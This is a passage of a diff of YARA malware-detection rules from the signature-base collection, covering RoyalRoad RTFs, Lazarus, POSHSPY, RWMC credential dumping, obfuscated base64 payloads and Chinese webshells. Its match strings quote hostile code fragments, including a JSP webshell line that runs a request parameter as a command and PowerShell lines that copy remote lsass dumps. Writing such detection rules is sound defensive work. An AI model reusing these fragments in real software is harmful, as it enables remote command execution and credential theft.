+		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+		hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+		hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
+		hash6 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
+		hash7 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
+		hash8 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
 
 	strings:
-		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|" wide
-		$x2 = "\\Release\\RTLBot.pdb" ascii
-		$x3 = "cmd.exe/c systeminfo >> 1.txt" fullword wide
-		$x4 = "/online >> Get online target with important info" fullword wide
-		$x5 = "/screen >> ScreenShot from target PC" fullword wide
-		$x6 = "/restart >> Restart Target PC" fullword wide
-		$x7 = "/log_key >> Get log key file" fullword wide
-		$a1 = "get_ShiftKey" fullword ascii
-		$a2 = "get_ControlKey" fullword ascii
-		$a3 = "get_AltKey" fullword ascii
-		$a4 = "get_MineInterval" fullword ascii
-		$fp1 = "Copyright Software Secure" wide
+		$s1 = "hWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z" fullword ascii
+		$s2 = "[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Y" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or all of ( $a* ) ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Gobfuscate_May21 : FILE
+rule SIGNATURE_BASE_Dubnium_Sample_Sshopenssl : FILE
 {
 	meta:
-		description = "Identifies binaries obfuscated with gobfuscate"
-		author = "James Quinn, Paul Hager (merged with new similar pattern)"
-		id = "ae518296-b1c3-568c-bae0-3e0a6f7600ba"
-		date = "2021-05-14"
-		modified = "2024-04-02"
-		reference = "https://github.com/unixpickle/gobfuscate"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gobfuscate.yar#L2-L18"
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d4f2b494-47b6-5b8e-b358-30159dfb977b"
+		date = "2016-06-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L133-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f71078dd6354a482a2ead2f0d25f4172cd40e62440a70c2da7916b68f26909a3"
-		score = 70
+		logic_hash = "5cad6b0785e8c9627f1b9678dc6206cf36cd33ead2283f77655fdb0ea36249e9"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+		hash2 = "feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
+		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+		hash4 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
+		hash5 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
+		hash6 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
 
 	strings:
-		$s1 = { 0F B6 ?? ?? ?? 0F B6 ?? ?? ?? 31 D? [0-1] 88 ?? ?? ?? 48 FF C? 48 83 F? ?? 7C E6 48 }
-		$s2 = { 0F B6 ?? ?? ?? 31 DA 88 ?? ?? ?? 40 83 ?? ?? 7D 09 0F B6 }
+		$s1 = "sshkeypairgen.exe" fullword wide
+		$s2 = "OpenSSL: FATAL" fullword ascii
 
 	condition:
-		filesize < 50MB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern1 : FILE
+rule SIGNATURE_BASE_POSHSPY_Malware
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "db2fb24c-df99-5622-ac3d-d31c34481984"
-		date = "2020-01-15"
+		description = "Detects"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7e908efc-0023-5be1-9871-8bfbf8b9e53a"
+		date = "2017-07-15"
 		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L25-L40"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poshspy.yar#L11-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ebd507d95c454562fa0b364072120b35b1bf8dd2be129a419d893f6708ab9cca"
-		score = 80
+		logic_hash = "e1f8b502950d2f7600041b5492f529682b9f5f2863c36ad40618b5ed78a94567"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$S1 = "48905d006c9c5b0000000000030101030a0a01085a5ab844eb7112ba7856341231"
-		$RTF = "{\\rt"
+		$x1 = "function sWP($cN, $pN, $aK, $aI)" fullword ascii
+		$x2 = "$aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2" ascii
+		$x3 = "(('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len',"
+		$x4 = "$cPairKey = \"BwIAAACkAABSU0EyAAQAAAEAA"
+		$x5 = "$exeRes = exePldRoutine"
+		$x6 = "ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA"
 
 	condition:
-		$RTF at 0 and $S1
+		1 of them
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern2 : FILE
+rule SIGNATURE_BASE_Reveal_Memorycredentials : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "135024ae-9ecf-5691-95ca-96002e500fd5"
-		date = "2020-01-15"
+		description = "Auto-generated rule - file Reveal-MemoryCredentials.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ca06c702-45fe-5ab5-b53e-c3f7b7006570"
+		date = "2015-08-31"
 		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L42-L57"
+		reference = "https://github.com/giMini/RWMC/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rwmc_powershell_creddump.yar#L8-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e252868042e5150d99de2c2f4642f3d91d764d5a062f3a8de9ab316e299e00ac"
-		score = 80
+		hash = "893c26818c424d0ff549c1fbfa11429f36eecd16ee69330c442c59a82ce6adea"
+		logic_hash = "d740462aacd3b30d0258d018344642683fefd43ef033dd7f5bdde2bdddce4115"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$S1 = "653037396132353234666136336135356662636665" ascii
-		$RTF = "{\\rt"
+		$s1 = "$dumpAProcessPath = \"C:\\Windows\\temp\\msdsc.exe\"" fullword ascii
+		$s2 = "$user = Get-ADUser -Filter {UserPrincipalName -like $loginPlainText -or sAMAccountName -like $loginPlainText}" fullword ascii
+		$s3 = "Copy-Item -Path \"\\\\$computername\\\\c$\\windows\\temp\\lsass.dmp\" -Destination \"$logDirectoryPath\"" fullword ascii
+		$s4 = "if($backupOperatorsFlag -eq \"true\") {$loginPlainText = $loginPlainText + \" = Backup Operators\"}            " fullword ascii
 
 	condition:
-		$RTF at 0 and $S1
+		filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern3 : FILE
+rule SIGNATURE_BASE_Minidumptest_Msdsc : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "7bce2fe6-a921-51ec-8b5f-5d7f55ab3864"
-		date = "2020-01-15"
+		description = "Auto-generated rule - file msdsc.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "044ae157-aba2-5935-9afc-8a12853c84bc"
+		date = "2015-08-31"
 		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L59-L75"
+		reference = "https://github.com/giMini/RWMC/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rwmc_powershell_creddump.yar#L26-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3b5d9872eb86d1a220e5b70c560e7054bee8b2bc1fa2a75781d87616674e2927"
-		score = 80
+		hash = "477034933918c433f521ba63d2df6a27cc40a5833a78497c11fb0994d2fd46ba"
+		logic_hash = "ae8a28df245a8f7a2d62639789c31556b012322fcac09784595fd6f95d6bf195"
+		score = 50
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$S1 = "4746424151515151505050500000000000584242eb0642424235353336204460606060606060606061616161616161616161616161616161"
-		$RTF = "{\\rt"
+		$s1 = "MiniDumpTest1.exe" fullword wide
+		$s2 = "MiniDumpWithTokenInformation" fullword ascii
+		$s3 = "MiniDumpTest1" fullword wide
+		$s6 = "Microsoft 2008" fullword ascii
 
 	condition:
-		$RTF at 0 and $S1
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern4Ab : FILE
+rule SIGNATURE_BASE_SUSP_Base64_Encoded_Hex_Encoded_Code
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "b4926888-b576-59f7-932a-03b9326845da"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L77-L92"
+		description = "Detects hex encoded code that has been base64 encoded"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2cfd278f-ff45-5e23-b552-dad688ab303b"
+		date = "2019-04-29"
+		modified = "2025-03-21"
+		reference = "https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_obfuscation.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd9468b3208a27b6f3b56037013f06c4d2adbd201a12df141bc980ad595a75c0"
-		score = 80
+		logic_hash = "f1451e2dd0e4e70a0f39f609331762cce369642e9fadbef83d932da2a0a6c60b"
+		score = 65
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$S1 = "4746424151515151505050500000000000584242EB064242423535333620446060606060606060606161616161616}1616161616161616161" ascii
-		$RTF = "{\\rt"
+		$x1 = { 78 34 4e ?? ?? 63 65 44 ?? ?? 58 48 67 }
+		$x2 = { 63 45 44 ?? ?? 58 48 67 ?? ?? ?? 78 34 4e }
+		$fp1 = "Microsoft Azure Code Signp$"
 
 	condition:
-		$RTF at 0 and $S1
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern4Ce : FILE
+rule SIGNATURE_BASE_SUSP_Reversed_Base64_Encoded_EXE : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "c6e8a072-23cd-5f6a-9b4f-57d3e4500d13"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L94-L109"
+		description = "Detects an base64 encoded executable with reversed characters"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3b52e59e-7c0a-560f-8123-1099c52e7e3d"
+		date = "2020-04-06"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_obfuscation.yar#L62-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7033c5874b406341a68f761b45fd6a9b73a9875c80b14d52a7c2240202c8fb40"
+		logic_hash = "0a2f1caf2235ee24f531c9f9a5ebdc0c97a90890218669749a4c83bede80a336"
 		score = 80
 		quality = 85
 		tags = "FILE"
+		hash1 = "7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8"
 
 	strings:
-		$S1 = "584242eb064242423535333620446060606060606060606161616161616161616161616}1616161" ascii
-		$RTF = "{\\rt"
+		$s1 = "AEAAAAEQATpVT"
+		$s2 = "AAAAAAAAAAoVT"
+		$s3 = "AEAAAAEAAAqVT"
+		$s4 = "AEAAAAIAAQpVT"
+		$s5 = "AEAAAAMAAQqVT"
+		$sh1 = "SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU" ascii
+		$sh2 = "LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR" ascii
+		$sh3 = "uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV" ascii
 
 	condition:
-		$RTF at 0 and $S1
+		filesize < 10000KB and 1 of them
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern4D : FILE
+rule SIGNATURE_BASE_SUSP_Script_Base64_Blocks_Jun20_1
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "1677dfb4-7611-5bef-87d1-4cec6285791f"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L113-L128"
+		description = "Detects suspicious file with base64 encoded payload in blocks"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cef759a5-b02a-53e7-bf27-184eee6bc3fa"
+		date = "2020-06-05"
+		modified = "2025-03-21"
+		reference = "https://posts.specterops.io/covenant-v0-5-eee0507b85ba"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_obfuscation.yar#L85-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9b531063d2a5ae36ae4e708a749dcf2cdc4c85fc43769a8525049e6facfca674"
-		score = 80
+		logic_hash = "7d456cbbbd76f543afe144a2876a02db834aa6b09ecd4d6aa2f25ce8eeac5de8"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$S1 = "584242eb06424242353533362044606060606060606060616161616161616161616}16161616161" ascii
-		$RTF = "{\\rt"
+		$sa1 = "<script language=" ascii
+		$sb2 = { 41 41 41 22 2B 0D 0A 22 41 41 41 }
 
 	condition:
-		$RTF at 0 and $S1
+		all of them
 }
-rule SIGNATURE_BASE_Royalroad_RTF : FILE
+rule SIGNATURE_BASE_SUSP_Reversed_Hacktool_Author : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "366ec9c3-e6ad-5198-88d5-15aa84a8358f"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L133-L148"
+		description = "Detects a suspicious path traversal into a Windows folder"
+		author = "Florian Roth (Nextron Systems)"
+		id = "33e20d75-af07-5df2-82c3-c48aec37a947"
+		date = "2020-06-10"
+		modified = "2025-03-21"
+		reference = "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_obfuscation.yar#L100-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "20031fe6d6a0b2fad43f7e04bb82321c2ea75193f23194edead7ca530af8ac55"
-		score = 80
+		logic_hash = "3681fb11dabf9905915d23f4198145b503a260d628415fd79ad71d7703ba9f6f"
+		score = 65
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$S1 = "objw2180\\objh300" ascii
-		$RTF = "{\\rt"
+		$x1 = "iwiklitneg" fullword ascii wide
+		$x2 = " eetbus@ " ascii wide
 
 	condition:
-		$RTF at 0 and $S1
+		filesize < 4000KB and 1 of them
 }
-rule SIGNATURE_BASE_Royalroad_RTF_V7 : FILE
+rule SIGNATURE_BASE_SUSP_Base64_Encoded_Hacktool_Dev : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "9d2af980-a851-533a-b25d-ee52277e319c"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L150-L166"
+		description = "Detects a suspicious base64 encoded keyword"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6dc7db4b-a614-51e4-a9a5-f869154dbbb1"
+		date = "2020-06-10"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/cyb3rops/status/1270626274826911744"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_obfuscation.yar#L116-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "da043123cf72e19295634720196d78bef3af89f44cba795dbbcee4c0f5c8159a"
-		score = 60
+		logic_hash = "7345a528a12f87e5cbcabccf649566a038dd2115e8aec4f39599e357c8c6d57f"
+		score = 65
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$v7_1 = "{\\object\\objocx{\\objdata" ascii
-		$v7_2 = "ods0000" ascii
-		$RTF = "{\\rt"
+		$ = "QGdlbnRpbGtpd2" ascii wide
+		$ = "BnZW50aWxraXdp" ascii wide
+		$ = "AZ2VudGlsa2l3a" ascii wide
+		$ = "QGhhcm1qMH" ascii wide
+		$ = "BoYXJtajB5" ascii wide
+		$ = "AaGFybWowe" ascii wide
+		$ = "IEBzdWJ0ZW" ascii wide
+		$ = "BAc3VidGVl" ascii wide
+		$ = "gQHN1YnRlZ" ascii wide
 
 	condition:
-		$RTF at 0 and all of ( $v7* )
+		filesize < 6000KB and 1 of them
 }
-rule SIGNATURE_BASE_Royalroad_Encode_In_RTF : FILE
+rule SIGNATURE_BASE_Tools_Cmd : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "66614152-8f9b-5e62-b6bd-ba0286e66d4d"
-		date = "2020-01-15"
+		description = "Chinese Hacktool Set - file cmd.jSp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "27c3cb44-9351-52a2-8e14-afade14e3384"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L168-L189"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L10-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "00a703a0d7b3a74ec9bfc8ad0e570ee04b3cb6b7f2c062cc2886b41f6fbea49d"
-		score = 60
+		hash = "02e37b95ef670336dc95331ec73dbb5a86f3ba2b"
+		logic_hash = "fe1a157d53bd9a48848f2711844c5e12356652ca01c84c19429c55bbb12ea488"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$enc_hex_1 = "B0747746"
-		$enc_hex_2 = "B2A66DFF"
-		$enc_hex_3 = "F2A32072"
-		$enc_hex_4 = "B2A46EFF"
-		$enc_hex_1l = "b0747746"
-		$enc_hex_2l = "b2a66Dff"
-		$enc_hex_3l = "f2a32072"
-		$enc_hex_4l = "b2a46eff"
-		$RTF = "{\\rt"
+		$s0 = "if(\"1752393\".equals(request.getParameter(\"Confpwd\"))){" fullword ascii
+		$s1 = "java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"Conn\"" ascii
+		$s2 = "<%@ page import=\"java.io.*\" %>" fullword ascii
+		$s3 = "out.print(\"Hi,Man 2015<br /><!--?Confpwd=023&Conn=ls-->\");" fullword ascii
+		$s4 = "while((a=in.read(b))!=-1){" fullword ascii
+		$s5 = "out.println(new String(b));" fullword ascii
+		$s6 = "out.print(\"</pre>\");" fullword ascii
+		$s7 = "out.print(\"<pre>\");" fullword ascii
+		$s8 = "int a = -1;" fullword ascii
+		$s9 = "byte[] b = new byte[2048];" fullword ascii
 
 	condition:
-		$RTF at 0 and 1 of ( $enc_hex* )
+		filesize < 3KB and 7 of them
 }
-rule SIGNATURE_BASE_Lazarus_Dec_17_1 : FILE
+rule SIGNATURE_BASE_Trigger_Drop : FILE
 {
 	meta:
-		description = "Detects Lazarus malware from incident in Dec 2017"
+		description = "Chinese Hacktool Set - file trigger_drop.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f195ebf0-d7af-58e8-a544-769a0c8b628b"
-		date = "2017-12-20"
+		id = "3b4f32ff-2de2-5689-869a-8a8f55e7fa0c"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8U6fY2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec17.yar#L12-L29"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L35-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "50ff8418cf342147a81ef3a418e5e61d42f0e5764982e43b51d4dd3a983a548e"
+		hash = "165dd2d82bf87285c8a53ad1ede6d61a90837ba4"
+		logic_hash = "fc998ea5c2a446278823e4336ddc6a22741f82c43fbdcd95b3d12ee6a27b1dd7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d5f9a81df5061c69be9c0ed55fba7d796e1a8ebab7c609ae437c574bd7b30b48"
 
 	strings:
-		$s1 = "::DataSpace/Storage/MSCompressed/Transform/" ascii
-		$s2 = "HHA Version 4." ascii
-		$s3 = { 74 45 58 74 53 6F 66 74 77 61 72 65 00 41 64 6F
-              62 65 20 49 6D 61 67 65 52 65 61 64 79 71 }
-		$s4 = "bUEeYE" fullword ascii
+		$s0 = "$_GET['returnto'] = 'database_properties.php';" fullword ascii
+		$s1 = "echo('<meta http-equiv=\"refresh\" content=\"0;url=' . $_GET['returnto'] . '\">'" ascii
+		$s2 = "@mssql_query('DROP TRIGGER" ascii
+		$s3 = "if(empty($_GET['returnto']))" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5449 and filesize < 4000KB and all of them
+		filesize < 5KB and all of them
 }
-rule SIGNATURE_BASE_Lazarus_Dec_17_2 : FILE
+rule SIGNATURE_BASE_Injectionparameters : FILE
 {
 	meta:
-		description = "Detects Lazarus malware from incident in Dec 2017"
+		description = "Chinese Hacktool Set - file InjectionParameters.vb"
 		author = "Florian Roth (Nextron Systems)"
-		id = "45127fb5-0f70-5140-acd9-46147d365dfe"
-		date = "2017-12-20"
+		id = "a77bd0c6-8857-577f-831a-0fcf2537667e"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8U6fY2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec17.yar#L31-L51"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L53-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "273cd54a0c3ecf53893de0ef9c41d784725eea6cc843e04df01cd8f29d61a797"
+		hash = "4f11aa5b3660c45e527606ee33de001f4994e1ea"
+		logic_hash = "6bb786256f7154013408323eeb597f91c609a2a26f5ae9e6d61e16bd9c16a577"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cbebafb2f4d77967ffb1a74aac09633b5af616046f31dddf899019ba78a55411"
-		hash2 = "9ca3e56dcb2d1b92e88a0d09d8cab2207ee6d1f55bada744ef81e8b8cf155453"
 
 	strings:
-		$s1 = "SkypeSetup.exe" fullword wide
-		$s2 = "%s\\SkypeSetup.exe" fullword ascii
-		$s3 = "Skype Technologies S.A." fullword wide
-		$a1 = "Microsoft Code Signing PCA" ascii wide
+		$s0 = "Public Shared ReadOnly Empty As New InjectionParameters(-1, \"\")" fullword ascii
+		$s1 = "Public Class InjectionParameters" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7000KB and ( all of ( $s* ) and not $a1 )
+		filesize < 13KB and all of them
 }
-rule SIGNATURE_BASE_Lazarus_Dec_17_4 : FILE
+rule SIGNATURE_BASE_Users_List : FILE
 {
 	meta:
-		description = "Detects Lazarus malware from incident in Dec 2017ithumb.js"
+		description = "Chinese Hacktool Set - file users_list.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fbdc6287-c177-53b5-83dd-979936f65192"
-		date = "2017-12-20"
+		id = "2d90b593-6b65-502c-aeb0-8f2a3d65afd3"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8U6fY2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec17.yar#L53-L67"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L69-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "70801347699d339cb47cad03ec3f694b09a976e32b70052a97fade09fcac679d"
+		hash = "6fba1a1a607198ed232405ccbebf9543037a63ef"
+		logic_hash = "debd8e1d882cbbe6e720b86bec3ff3c78393cb225b3f0f9c7725cfced6582e71"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ff100ca86cb62117f1290e71d5f9c0519661d6c955d9fcfb71f0bbdf75b51b3"
-		hash2 = "7975c09dd436fededd38acee9769ad367bfe07c769770bd152f33a10ed36529e"
